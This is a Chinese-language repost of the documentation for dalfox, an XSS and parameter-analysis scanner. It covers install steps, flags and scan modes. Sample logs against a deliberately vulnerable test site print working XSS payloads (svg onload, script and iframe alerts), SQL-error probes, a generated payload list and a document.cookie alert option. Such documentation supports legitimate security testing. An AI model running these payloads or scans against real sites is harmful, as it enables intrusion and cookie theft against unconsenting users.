dalfox 基于golang的参数分析型XSS漏洞扫描工具

dalfox 基于golang的参数分析型XSS漏洞扫描工具



DalFox 是一个快速、强大的参数分析型XSS 扫描器,基于一个 golang/DOM 解析器。支持友好的 Pipeline、CI/CD 和不同类型 XSS 的测试。Dal(달)是moon的韩语发音,fox被做成了Fox(Find Of XSS)

dalfox 基于golang的参数分析型XSS漏洞扫描工具


模式: url sxss pipe file server payload

发现参数分析– 查找反射参数
– 查找活动/坏的特殊字符、事件处理程序和攻击代码
– 注入点的识别(HTML/JS/属性)
inHTML-none inJS-none inJS-double inJS-single inJS-backtick inATTR-none inATTR-double inATTR-single
静态分析– 使用 req/res base 检查 CSP、XFO 等坏头文件
BAV分析– 测试 BAV(基本另一个漏洞),例如sqli ssti open-redirectscrlf
参数挖掘– 使用字典攻击查找新参数(默认为GF-Patterns
– 支持自定义字典文件 ( --mining-dict-word)
– 使用 DOM 查找新参数
– 使用远程字典挖掘 ( --remote-wordlists)
内置 Grepping– 识别SSTi、Credential、SQL Error等基本信息泄露
WAF检测和规避– 检测到 WAF(Web 应用程序防火墙)。
– 如果找到 waf 并使用特殊标志,使用慢速请求规避
扫描XSS 扫描– 反射型 XSS / 存储型 XSS / DOM XSS
– DOM 基础验证
– 无头基础验证
– 带参数、标头(-b--blind选项)的盲 XSS 测试
– 仅测试选定参数 ( -p--param)
– 仅测试参数分析 ( --only-discovery)
友好管道– 单 url 模式 ( dalfox url)
– 从文件模式 ( dalfox file urls.txt)
– 从 IO(管道) 模式 ( dalfox pipe)
– 从原始 http 请求文件模式 ( dalfox file raw.txt --rawdata)
payloads优化查询– 通过抽象检查注入点并生成适合的payloads。
– 基于 badchar 消除不必要的有效载荷
编码器– 所有payloads测试(内置、您的自定义/盲测)都与编码器并行测试。
– 双 URL 编码器
– HTML 十六进制编码器
序列– 自动检查存储 xss 的特殊页面 ( --trigger)
– 支持 ( --sequence) 存储 XSS 选项,仅sxss模式
HTTPHTTP 选项– 覆盖 HTTP 方法 ( -X--method)
– 跟随重定向 ( --follow-redirects)
– 添加标头 ( -H--header)
– 添加 cookie ( -C--cookie)
– 添加用户代理 ( --user-agent)
– 设置超时 ( --timeout)
– 设置延迟 ( --delay)
– 设置代理 ( --proxy)
– 设置忽略返回代码 ( --ignore-return)
– 从原始请求 ( --cookie-from-raw)加载 cookie
并发Worker– 设置worker编号( -w--worker)
N * 主机– 使用多线程模式 ( --multicast) ,仅file/pipe模式
输出输出– 只有 PoC 代码和有用信息被写入标准
输出 – 保存输出 ( -o--output)
格式– JSON / 普通 ( --format)
printing– 静音模式 ( --silence)
– 您可以选择不打印颜色 ( --no-color)
– 您可以选择不打印微调器 ( --no-spinner)
– 您可以选择仅显示特殊的 poc 代码 ( --only-poc)
可扩展性REST API– API 服务器和 Swagger ( dalfox server)
payloads模式– 生成和枚举用于 XSS 测试的 payloads ( dalfox payload)
发现动作– 允许您指定检测到时要采取的操作。
– 通知,例如 ( --found-action)
自定义搜索– 可以使用自定义正则表达式对响应进行 grep
– 如果重复检测,则执行重复数据删除 ( --grep)
自定义 payloads – 使用自定义 payloads 列表文件 ( --custom-payload)
– 自定义警报值 ( --custom-alert-value)
– 自定义警报类型 ( --custom-alert-type)
远程 payloads – 使用来自portswigger、payloadbox等的远程payloads..( --remote-payloads)
包管理器– pkg.go.dev
homebrew with tap
– snapcraft
Docker 环境– docker hub
– docker 的 gitub 包
其他– github action


dalfox 基于golang的参数分析型XSS漏洞扫描工具



例如在kali linux中下载 alfox_2.5.3_linux_amd64.tar.gz
输入 ./alfox回车即可

dalfox 基于golang的参数分析型XSS漏洞扫描工具


Homebrew 是 MacOS(或 linux)的包管理器。在使用Homebrew的设备上,您可以使用 brew 命令轻松安装/更新。


/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
安装 dalfox
brew tap hahwul/dalfox
brew install dalfox

使用 Snapcraft

Snapcraft 是 Linux 的打包管理器之一。
与 app 和 yum 不同,它可以独立于部署操作系统版本使用。

安装 Snapcraft


安装 dalfox
sudo snap install dalfox



go install github.com/hahwul/dalfox/v2@latest


GO111MODULE=on go get github.com/hahwul/dalfox/v2

使用 Docker安装

Dalfox 按版本提供 docker 镜像。它可以在容量较小的情况下轻轻使用

docker pull hahwul/dalfox:latest


docker run -it hahwul/dalfox:latest /app/dalfox url https://www.hahwul.com


docker run -it hahwul/dalfox:latest /bin/bash



dalfox_2.5.3_darwin_amd64.tar.gz7.68 MB
dalfox_2.5.3_darwin_arm64.tar.gz7.67 MB
dalfox_2.5.3_freebsd_386.tar.gz7.05 MB
dalfox_2.5.3_freebsd_amd64.tar.gz7.49 MB
dalfox_2.5.3_freebsd_arm64.tar.gz7.02 MB
dalfox_2.5.3_freebsd_armv6.tar.gz7.07 MB
dalfox_2.5.3_linux_386.tar.gz7.05 MB
dalfox_2.5.3_linux_amd64.tar.gz7.47 MB
dalfox_2.5.3_linux_arm64.tar.gz7.01 MB
dalfox_2.5.3_linux_armv6.tar.gz7.06 MB
dalfox_2.5.3_windows_amd64.tar.gz7.51 MB


解压密码: www.ddosi.org


从 Homebrew 安装的更新方法

brew upgrade dalfox

从 snapcraft 安装的更新方法

sudo snap refresh dalfox


go get -v github.com/hahwul/dalfox/v2

从 docker 安装的更新方法

docker pull hahwul/dalfox:latest


Dalfox 的选项主要配置为commandsflags

dalfox [command] [flags]
  file        Use file mode(targets list or rawdata)
  help        Help about any command
  pipe        Use pipeline mode
  server      Start API Server
  sxss        Use Stored XSS mode
  url         Use single target mode
  version     Show version

Global Flags:
-b, --blind string                Add your blind xss
                                    * Example: -b hahwul.xss.ht
    --config string               Using config from file
-C, --cookie string               Add custom cookie
    --cookie-from-raw string      Load cookie from burp raw http request
                                    * Example: --cookie-from-raw request.txt
    --custom-alert-type string    Change alert value type
                                    * Example: --custom-alert-type=none / --custom-alert-type=str,none (default "none")
    --custom-alert-value string   Change alert value
                                    * Example: --custom-alert-value=document.cookie (default "1")
    --custom-payload string       Add custom payloads from file
-d, --data string                 Using POST Method and add Body data
    --debug                       debug mode, save all log using -o option
    --deep-domxss                 DOM XSS Testing with more payloads on headless [so slow]
    --delay int                   Milliseconds between send to same host (1000==1s)
-F, --follow-redirects            Following redirection
    --format string               Stdout output format
                                    * Supported: plain / json (default "plain")
    --found-action string         If found weak/vuln, action(cmd) to next
                                    * Example: --found-action='./notify.sh'
    --found-action-shell string Select shell application for --found-action (default "bash")
    --grep string                 Using custom grepping file
                                    * Example: --grep ./samples/sample_grep.json
-H, --header string               Add custom headers
-h, --help                        help for dalfox
    --ignore-return string        Ignore scanning from return code
                                    * Example: --ignore-return 302,403,404
-X, --method string               Force overriding HTTP Method
                                    * Example: -X PUT (default "GET")
    --mining-dict                 Find new parameter with dictionary attack, default is Gf-Patterns=>XSS (default true)
-W, --mining-dict-word string     Custom wordlist file for param mining
                                    * Example: --mining-dict-word word.txt
    --mining-dom                  Find new parameter in DOM (attribute/js value) (default true)
    --no-color                    Not use colorize
    --no-spinner                  Not use spinner
    --only-custom-payload         Only testing custom payload (required --custom-payload)
    --only-discovery              Only testing parameter analysis (same '--skip-xss-scanning' option)
    --only-poc string             Shows only the PoC code for the specified pattern (g: grep / r: reflected / v: verified)
-o, --output string               Write to output file (By default, only the PoC code is saved)
    --output-all                  All log write mode (-o or stdout)
-p, --param string                Only testing selected parameters
    --proxy string                Send all request to proxy server
                                    * Example: --proxy
    --remote-payloads string      Using remote payload for XSS testing
                                    * Supported: portswigger/payloadbox
                                    * Example: --remote-payloads=portswigger,payloadbox
    --remote-wordlists string     Using remote wordlists for param mining
                                    * Supported: burp/assetnote
                                    * Example: --remote-wordlists=burp
-S, --silence                     Not printing all logs
    --skip-bav                    Skipping BAV(Basic Another Vulnerability) analysis
    --skip-grepping               Skipping built-in grepping
    --skip-headless               Skipping headless browser base scanning[DOM XSS and inJS verify]
    --skip-mining-all             Skipping ALL parameter mining
    --skip-mining-dict            Skipping Dict base parameter mining
    --skip-mining-dom             Skipping DOM base parameter mining
    --skip-xss-scanning           Skipping XSS Scanning (same '--only-discovery' option)
    --timeout int                 Second of timeout (default 10)
    --user-agent string           Add custom UserAgent
-w, --worker int                  Number of worker (default 100)

Server Flags:
  -h, --help          help for server
      --host string   Bind address (default "")
      --port int      Bind Port (default 6664)

Pipe Flags:
  -h, --help        help for pipe
      --mass              Parallel scanning N*Host mode (show only poc code)
      --mass-worker int   Parallel worker of --mass and --multicast option (default 10)
      --multicast   Parallel scanning N*Host mode (show only poc code)

File Flags:
  -h, --help        help for file
      --http        Using force http on rawdata mode
      --mass              Parallel scanning N*Host mode (show only poc code)
      --mass-worker int   Parallel worker of --mass and --multicast option (default 10)
      --multicast   Parallel scanning N*Host mode (show only poc code)
      --rawdata     Using req rawdata from Burp/ZAP

SXSS Flags:
  -h, --help             help for sxss
      --sequence int     Set sequence to first number
                           * Example: --trigger=https://~/view?no=SEQNC --sequence=3 (default -1)
      --trigger string   Checking this url after inject sxss code
                           * Example: --trigger=https://~~/profile

Payload Flags:
      --encoder-url            Encoding output [URL]
      --entity-event-handler   Enumerate a event handlers for xss
      --entity-gf              Enumerate a gf-patterns xss params
      --entity-special-chars   Enumerate a special chars for xss
      --entity-useful-tags     Enumerate a useful tags for xss
      --enum-attr              Enumerate a in-attr xss payloads
      --enum-common            Enumerate a common xss payloads
      --enum-html              Enumerate a in-html xss payloads
      --enum-injs              Enumerate a in-js xss payloads
  -h, --help                   help for payload
      --make-bulk              Make bulk payloads for stored xss
      --remote-payloadbox      Enumerate a payloadbox's xss payloads
      --remote-portswigger     Enumerate a portswigger xss cheatsheet payloads


  file        使用文件模式(目标列表或原始数据)
  help        任何命令的帮助信息
  pipe        使用管道模式
  server      启动API server
  sxss        使用存储型XSS模式
  url         使用单目标模式
  version     显示版本信息

-b, --blind string                添加你的盲xss列表
                                    * 例如: -b hahwul.xss.ht
    --config string               从文件导入配置文件
-C, --cookie string               添加自定义cookie
    --cookie-from-raw string      从burp raw http请求加载cookie
                                    * 例如: --cookie-from-raw request.txt
    --custom-alert-type string    更改警报值类型
                                    * 例如: --custom-alert-type=none / --custom-alert-type=str,none (default "none")
    --custom-alert-value string   更改警报值类型
                                    * 例如: --custom-alert-value=document.cookie (default "1")
    --custom-payload string       从文件中添加自定义payload
-d, --data string                 使用POST方法并添加Body数据
    --debug                       调试模式,使用-o选项保存所有日志
    --deep-domxss                 在headless上使用更多payload进行DOM XSS测试[十分缓慢]
    --delay int                   发送到同一主机的间隔毫秒数(1000==1s)
-F, --follow-redirects            跟随重定向
    --format string               标准输出的输出格式
                                    * 支持的格式: plain / json (default "plain")
    --found-action string         如果找到漏洞,到下一步动作(cmd)
                                    * 例如: --found-action='./notify.sh'
    --found-action-shell string   选择shell应用程序(默认为bash)
    --grep string                 使用自定义grepping文件
                                    * 例如: --grep ./samples/sample_grep.json
-H, --header string               添加自定义头
-h, --help                        dalfox帮助信息
    --ignore-return string        忽略返回代码进行扫描
                                    * 例如: --ignore-return 302,403,404
-X, --method string               强制覆盖HTTP方法
                                    * 例如: -X PUT (default "GET")
    --mining-dict                 查找带有字典攻击的新参数,默认为Gf-Patterns=>XSS(默认为true)
-W, --mining-dict-word string     用于参数挖掘的自定义字典列表文件
                                    * 例如: --mining-dict-word word.txt
    --mining-dom                  在DOM中查找新参数(attribute/js value)(默认为true)
    --no-color                    不要使用colorize
    --no-spinner                  不要使用spinner
    --only-custom-payload         仅测试自定义payload(必需 --custom-payload)
    --only-discovery              仅测试参数分析(相同的'--skip-xss-scanning'选项)
    --only-poc string             只显示指定模式的PoC代码(g: grep / r: reflected / v: verified)
-o, --output string               写入输出文件(默认情况下,只保存PoC代码)
    --output-all                  所有日志写入模式(-o或标准输出)
-p, --param string                只测试选定的参数
    --proxy string                发送所有请求到代理服务器
                                    * 例如: --proxy
    --remote-payloads string      使用远程payload进行XSS测试
                                    * 支持的远程payload: portswigger/payloadbox
                                    * 例如: --remote-payloads=portswigger,payloadbox
    --remote-wordlists string     使用远程字典列表进行参数挖掘
                                    * 支持: burp/assetnote
                                    * 例如: --remote-wordlists=burp
-S, --silence                     不打印所有日志
    --skip-bav                    跳过BAV(另一个基本漏洞)分析
    --skip-grepping               跳过内置的grepping
    --skip-headless               Skipping headless browser base scanning[DOM XSS and inJS verify]
    --skip-mining-all             跳过所有的参数挖掘
    --skip-mining-dict            跳过Dict型参数挖掘
    --skip-mining-dom             跳过DOM型基础参数挖掘
    --skip-xss-scanning           跳过XSS扫描(相同的'--only-discovery'选项)
    --timeout int                 超时时间(默认为10秒)
    --user-agent string           添加自定义UserAgent
-w, --worker int                  并发数量(默认100)

服务器 Flags:
  -h, --help          服务器的帮助
      --host string   绑定地址(默认为0.0.0.0)
      --port int      绑定端口(默认为6664)

Pipe Flags:
  -h, --help        pipe帮助信息
      --mass              并行扫描N*主机模式(仅显示poc代码)
      --mass-worker int   选项的并行工作器(默认为10)
      --multicast   并行扫描N*主机模式(仅显示poc代码)

File Flags:
  -h, --help        文件帮助信息
      --http        在rawdata模式下强制http
      --mass              并行扫描N*主机模式(仅显示poc代码)
      --mass-worker int   选项的并行工作器(默认为10)
      --multicast   并行扫描N*主机模式(仅显示poc代码)
      --rawdata     Using req rawdata from Burp/ZAP

SXSS Flags:
  -h, --help             sxss帮助信息
      --sequence int     将sequence设置为第一个数字
                           * 例如: --trigger=https://~/view?no=SEQNC --sequence=3 (default -1)
      --trigger string   在注入sxss代码后检查这个url
                           * 例如: --trigger=https://~~/profile

Payload Flags:
      --encoder-url            编码输出[URL]
      --entity-event-handler   枚举xss的事件处理程序
      --entity-gf              枚举一个gf-patterns xss参数
      --entity-special-chars   为xss枚举一个特殊字符
      --entity-useful-tags     为xss列举一个有用的标记
      --enum-attr              枚举一个in-attr xss payload
      --enum-common            列举一个常见的xss payload
      --enum-html              枚举一个内html xss payload
      --enum-injs              枚举一个in-js xss payload
  -h, --help                   帮助payload
      --make-bulk              为存储的xss创建批量 payload
      --remote-payloadbox      枚举一个payload箱的xsspayload
      --remote-portswigger     列举端口装卸工具xss备查单payload


dalfox 一共支持五种模式。( urlpipefilesxssserver)



url mode 是检测单个 URL 的 XSS 的模式。

dalfox url {TARGET-URL}


dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff


pipemode 是扫描多个 URL 的模式。我作为系统 I/O 接收输入,因此您可以通过管道与其他工具连接。

dalfox pipe


echo urls.txt | dalfox pipe


filemode 是一种扫描多个 URL 或基于 Burp Suite/ZAP 中的原始请求文件进行扫描的模式。输入是文件名。

dalfox file {filename}

如果该文件是一个 URL 列表,则继续像 Pipe 一样扫描多个 URL,如果是该--rawdata选项,则将其识别为原始请求,分析该文件并对其进行测试。


dalfox file urls.txt

从 burp/zap 原始请求文件扫描

dalfox file req.raw --rawdata

存储型 XSS 模式

sxssmode 是一种便于识别 Stored XSS 的模式。默认行为与 url 模式相同,但您可以指定单独的 URL 进行验证,并且可以使用 –sequence 选项生成动态验证 URL,以防验证 ​​URL 更改。

dalfox sxss {TARGET-URL} --trigger {VERIFY_URL}


dalfox sxss https://test.url.local/update_profile -d "nickname=abc" --trigger "https://test.url.local/my_profile"

服务器模式(REST API)

servermode 是一种 REST API 模式,它考虑了可扩展性。使用此模式,dalfox 充当 REST API 服务器并可以使用 Web 请求执行扫描。

dalfox server


▶ dalfox server --host --port 8090
  .' .::::.   __   _   _    ___ _ __ __
 :  :::::::: |  \ / \ | |  | __/ \\ V /
 :  :::::::: | o ) o || |_ | _( o )) (
 '. '::::::' |__/|_n_||___||_| \_//_n_\

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul

 ?  Target                 REST API Mode
 ?  Listen Address
 ?  Method                 GET
 ?  Worker                 100
 ?  BAV                    true
 ⛏  Mining                 true (Gf-Patterns)
 ?  Mining-DOM             true (mining from DOM)
 ⏱  Timeout                10
 ?  FollowRedirect         false
 ?  Started at             2021-07-08 18:10:15.214339875 +0900 KST m=+0.027712246

并支持 swagger-ui

dalfox 基于golang的参数分析型XSS漏洞扫描工具



curl -X POST "http://localhost:6664/scan" -H "accept: application/json" -H "Content-Type: application/json" -d "{\"url\": \"https://www.hahwul.com\"}"





curl -X POST "http://localhost:6664/scan" \
-H "accept: application/json" \
-H "Content-Type: application/json" \
-d "{\"url\": \"https://www.hahwul.com\", \"options\":{\"cookie\":\"testz=11\",\"worker\":1}}"



默认情况下,选项值与 cli 选项大致相同。

  "options": {
    "param":"only testing this parameter",
    "cookie": "auth=1234",
    "header": "API-Key: abcd",
    "config": "",
    "blind": "your.xss.ht",
    "data": "param=1234",
    "user-agent": "ChromeTestUA",
    "output": "output file",
    "format": "json",
    "found-action": "echo 1",
    "proxy": "",
    "grep": "TESTTOKEN",
    "ignore-return": "500",
    "trigger": "/trigger_url_using_sxss_mode",
    "timeout": 5,
    "worker": 30,
    "delay": 1,
    "sequence": 1,
    "only-discovery": false,
    "only-custom-payload": false,
    "silence": false,
    "mass": false,
    "follow-redirects": false,
    "mining-dict": true,
    "mining-dom": false,
    "mining-dict-word": "file_name",
    "no-color": false,
    "method": "GET",
    "no-spinner": false,
    "no-bav": false,
    "skip-grepping": false,
    "debug": false,


Swagger ui 在 dalfox 中可用。


例如 http://localhost:6664/swagger/index.html


payloadmode 是一种便于 XSS 测试的模式。生成和枚举 XSS Payloads 和 wordlist

dalfox payload {flags}


dalfox payload --enum-injs --entity-event-handler"


Make-bulk 生成许多 xss payload。此时,警报的参数配置为序列,很容易找到XSS测试期间触发的有效载荷。

dalfox payload --make-bulk


<track onbeforepaste=\"alert(488)\" contenteditable>test<\/track>
<tt onbeforepaste=\"alert(489)\" contenteditable>test<\/tt>
<u onbeforepaste=\"alert(490)\" contenteditable>test<\/u>
<ul onbeforepaste=\"alert(491)\" contenteditable>test<\/ul>
<var onbeforepaste=\"alert(492)\" contenteditable>test<\/var>
<video onbeforepaste=\"alert(493)\" contenteditable>test<\/video>
<wbr onbeforepaste=\"alert(494)\" contenteditable>test<\/wbr>
<xmp onbeforepaste=\"alert(495)\" contenteditable>test<\/xmp>
<body onbeforeprint=alert(496)>
<svg><path><animateMotion onbegin=alert(497) dur=\"1s\" repeatCount=\"1\">
<svg><animatetransform onbegin=alert(498) attributeName=transform>
<svg><set onbegin=alert(499) attributename=x dur=1s>
<svg><animate onbegin=alert(500) attributeName=x dur=1s>
<input onblur=alert(501) id=x><input autofocus>
<textarea onblur=alert(502) id=x><\/textarea><input autofocus>


--encoder-url            Encoding output [URL]


--entity-event-handler   Enumerate a event handlers for xss
--entity-gf              Enumerate a gf-patterns xss params
--entity-special-chars   Enumerate a special chars for xss
--entity-useful-tags     Enumerate a useful tags for xss
--enum-attr              Enumerate a in-attr xss payloads
--enum-common            Enumerate a common xss payloads
--enum-html              Enumerate a in-html xss payloads
--enum-injs              Enumerate a in-js xss payloads
--make-bulk              Make bulk payloads for stored xss
--remote-payloadbox      Enumerate a payloadbox's xss payloads
--remote-portswigger     Enumerate a portswigger xss cheatsheet payloads


dalfox 基于golang的参数分析型XSS漏洞扫描工具

扫描单个 URL


dalfox url http://testphp.vulnweb.com/listproducts.php
dalfox 基于golang的参数分析型XSS漏洞扫描工具


Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php
[*] Vaild target [ code:200 / size:4819 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?
[*] Start static analysis.. ?
[*] BAV analysis done ✓
[*] Start parameter analysis.. ?
[I] Found 2 testing point in DOM Mining
[G] Found dalfox-error-mysql2 via built-in grepping / original request
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php
[G] Found dalfox-error-mysql via built-in grepping / original request
    Warning: mysql_fetch_array() expects parameter 1 to be resource, null given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
[*] Static analysis done ✓
[G] Found dalfox-error-mysql1 via built-in grepping / payload: dalfox>
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3E
[G] Found dalfox-error-mysql5 via built-in grepping / payload: dalfox>
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3E
[*] Parameter analysis  done ✓
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  ▶
    48 line:  	Error: Unknown column 'DalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. ?
[*] Start XSS Scanning.. with 201 queries ?
[V] Triggered XSS Payload (found DOM Object): cat=<dalfox class=dalfox>
    48 line:  yntax to use near '=<dalfox class=dalfox>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3Cdalfox+class%3Ddalfox%3E
[*] Finish :D

扫描多个 URL



cat samples/sample_target.txt| dalfox pipe


[*] Using pipeline mode
[*] Loaded 2 target urls
[*] Target URL: https://www.hahwul.com/?q=123
[*] Vaild target [ code:200 / size:68629 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?
[*] Start static analysis.. ?
[*] Start parameter analysis.. ?
[*] Static analysis done ✓
[I] Found 1 testing point in DOM Mining
[*] BAV analysis done ✓ing routines
[*] Parameter analysis  done ✓tines
[I] Content-Type is text/html; charset=utf-8
[I] Access-Control-Allow-Origin is *
[*] Generate XSS payload and optimization.Optimization.. ?
[*] Start XSS Scanning.. with 33 queries ?
[*] Finish :D
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=1
[*] Vaild target [ code:200 / size:4868 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?
[*] Start parameter analysis.. ?
[*] Start static analysis.. ?
[G] Found dalfox-error-mysql via built-in grepping / payload: toGrepping
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%3B
[G] Found dalfox-error-mysql2 via built-in grepping / payload: toGrepping
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%3B
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toGrepping
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=+AND+0&ff=1
[G] Found dalfox-error-mysql1 via built-in grepping / payload: toGrepping
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=+AND+0&ff=1
[I] Found 2 testing point in DOM Mining
[*] Static analysis done ✓
[*] BAV analysis done ✓
[*] Parameter analysis  done ✓tines
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  ▶
    48 line:  	Error: Unknown column 'asdfDalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. ?
[*] Start XSS Scanning.. with 201 queries ?
[V] Triggered XSS Payload (found DOM Object): cat='><sVg/onload=alert(45) class=dalfox>
    48 line:  syntax to use near ''><sVg/onload=alert(45) class=dalfox>' at line 1
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf%27%3E%3CsVg%2Fonload%3Dalert%2845%29+class%3Ddalfox%3E&ff=1



dalfox file ./samples/sample_target.txt


[*] Using file mode(targets list)
[*] Loaded 2 target urls
[*] Target URL: https://www.hahwul.com/?q=123
[*] Vaild target [ code:200 / size:68629 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?
[*] Start parameter analysis.. ?
[*] Start static analysis.. ?
[I] Found 1 testing point in DOM Mining
[*] Static analysis done ✓
[*] BAV analysis done ✓ing routines
[*] Parameter analysis  done ✓
[I] Content-Type is text/html; charset=utf-8
[I] Access-Control-Allow-Origin is *
[*] Generate XSS payload and optimization.Optimization.. ?
[*] Start XSS Scanning.. with 33 queries ?
[*] Finish :D
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=1
[*] Vaild target [ code:200 / size:4868 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?
[*] Start static analysis.. ?
[*] Start parameter analysis.. ?
[G] Found dalfox-error-mysql via built-in grepping / payload: toGrepping
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%27+or+
[G] Found dalfox-error-mysql2 via built-in grepping / payload: toGrepping
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf&ff=%27+or+
[*] Static analysis done ✓
[G] Found dalfox-error-mysql5 via built-in grepping / payload: toGrepping
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=+HAVING+1%3D1--&ff=1
[G] Found dalfox-error-mysql1 via built-in grepping / payload: toGrepping
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=+HAVING+1%3D1--&ff=1
[I] Found 2 testing point in DOM Mining
[*] BAV analysis done ✓ing routines
[*] Parameter analysis  done ✓tines
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  ▶
    48 line:  	Error: Unknown column 'asdfDalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. ?
[*] Start XSS Scanning.. with 201 queries ?
[V] Triggered XSS Payload (found DOM Object): cat=</ScriPt><sCripT class=dalfox>alert(45)</sCriPt>
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=asdf%3C%2FScriPt%3E%3CsCripT+class%3Ddalfox%3Ealert%2845%29%3C%2FsCriPt%3E&ff=1
[*] Finish :D



通过 Pipeline 使用 dalfox 输出到其他工具


dalfox url http://testphp.vulnweb.com/listproducts.php | grep "\[V\]" | cut -d " " -f2 | xargs -I % open %

仅使用 Stdout 保存 PoC 代码


dalfox url http://testphp.vulnweb.com/listproducts.php > output


▶ cat output
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox.
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox.
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3CsCriPt+class%3Ddalfox%3Eprompt%2845%29%3C%2Fscript%3E

仅保存带有-o标志的PoC 代码


dalfox url http://testphp.vulnweb.com/listproducts.php -o output


▶ cat output
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox.
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox.
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3CsCriPt+class%3Ddalfox%3Eprompt%2845%29%3C%2Fscript%3E



dalfox url http://testphp.vulnweb.com/listproducts.php -o alllog.txt --output-all


▶ cat alllog.txt
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php
[*] Vaild target [ code:200 / size:4819 ]
[*] Using dictionary mining option [list=GF-Patterns] ?⛏
[*] Using DOM mining option ?⛏
[*] Start static analysis.. ?
[*] Start parameter analysis.. ?
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect]  ?

只保存特殊的 PoC 代码


  • g( grep)
  • r( reflected)
  • v( verified)


  • G: 
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%2C
  • r: 
[POC][R][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3CdETAILS%250aopen%250aonToGgle%250a%3D%250aa%3Dprompt%2Ca%28%29%3E
  • v: 
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert%281%29+class%3Ddalfox%3E%3C%2FiFramE%3E

命令(仅 grep 和已验证的 poc)

dalfox url http://testphp.vulnweb.com/listproducts.php --only-poc=g,v




	"Timeout": 30,
	"Concurrence": 100,
	"Delay": 30,
